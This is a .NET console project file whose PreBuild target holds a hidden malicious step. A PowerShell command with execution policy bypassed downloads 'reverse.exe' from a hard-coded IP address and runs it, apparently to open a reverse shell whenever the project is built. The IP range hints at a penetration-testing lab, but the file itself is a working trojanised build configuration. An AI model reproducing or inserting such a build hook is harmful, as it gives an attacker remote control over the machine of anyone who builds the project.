<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
    <RunPostBuildEvent>Always</RunPostBuildEvent>
  </PropertyGroup>

  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -ep bypass &quot;iwr -uri http://10.10.14.122:8081/reverse.exe -OutFile c:\windows\temp\reverse.exe;Start-Process -FilePath C:\windows\temp\reverse.exe" />
  </Target>

</Project>
